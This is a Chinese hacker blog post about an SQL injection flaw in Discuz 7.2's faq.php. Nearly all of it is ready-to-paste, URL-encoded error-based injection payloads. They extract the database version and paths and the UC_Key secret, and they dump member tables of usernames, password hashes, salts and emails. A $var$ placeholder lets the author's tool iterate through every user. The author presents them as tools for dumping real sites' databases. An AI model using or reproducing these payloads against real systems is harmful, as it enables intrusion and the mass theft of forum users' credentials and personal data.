注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

Discuz 7.2 faq.php SQL注入漏洞 爆管理员 爆UC_Key K8脱库专用语句  

2014-07-07 23:32:56|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Discuz 7.2 faq.php SQL注入漏洞 爆管理员 爆UC_Key K8脱库专用语句

官方已出补丁   某些站正要XX的时候被人提交WOOYUN 被补了
尼码估计就只有那啥站上面有女神信息了 一小时不到补了 尼码..

K8注入点脱库工具 暂不提供下载   http://weibo.com/k8gege
因为临时应急而写的 不过也支持脱很多注入点的库了...
DZ仅仅只是个例子 只要你把SQL语句里的ID=$var$ 就可脱
没有SQLMAP那么麻烦 那么慢 也不会像BURP搞得卡死
VPN超时2800多毫秒 都能正常脱库 不卡不搞死目标站

Discuz 7.2 /faq.php SQL注入漏洞 爆管理员 爆UC_Key K8脱库专用语句 - K8拉登哥哥 - K8拉登哥哥s Blog
 
演示动画教程http://pan.baidu.com/s/1i3gNeW9

http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

版本
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
数据库
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MYSQL路径
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@basedir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MYSQL数据路径
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@datadir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
tmdir
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@tmpdir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

uc_key 2次 64位  不准  默认搭建的可爆出 但实战有时也爆出90多位 实际人家才64位

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23

 然后爆出uc key  好像这个爆出来长度的样子 但实战不准 爆出100多位来
 拿到shell进去发现key也是64位  但是默认打键的 这个也能准确爆出

exp1:

/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

 exp2:

/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

下面是K8脱库工具专用的脱库语句(因为有些站你拿不到shell也进不了后台时)

脱库1 最大ID  '4063861' for key 'group_key' 后面多了一个1
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20max(uid)%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

脱库1 总数 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat(count(*))%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

脱库1 用户 密码 邮箱 显示不完
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
脱库2 用户 密码 邮箱 显示不完
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

所以得分开脱  id 用户 密码 脱1次  ID和邮箱脱一次

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID和邮箱
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

脱库1 对应脱库语句
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID和邮箱
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

========================================================================================================

脱库2 最大ID
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28max(uid)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
脱库2 总数 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28count(*)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

脱库2
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20cdb_uc_members where uid=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


针对dz7.2的两条脱库payload
 
因为有些站的表是  cdb_ucmembers 有些是uc_member


其它程序注入 就另外写 id变量 $var$

假设 where uid=1  爆出id为1的信息
where uid=$var$  脱库语句就这样写
  评论这张
 
阅读(8048)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016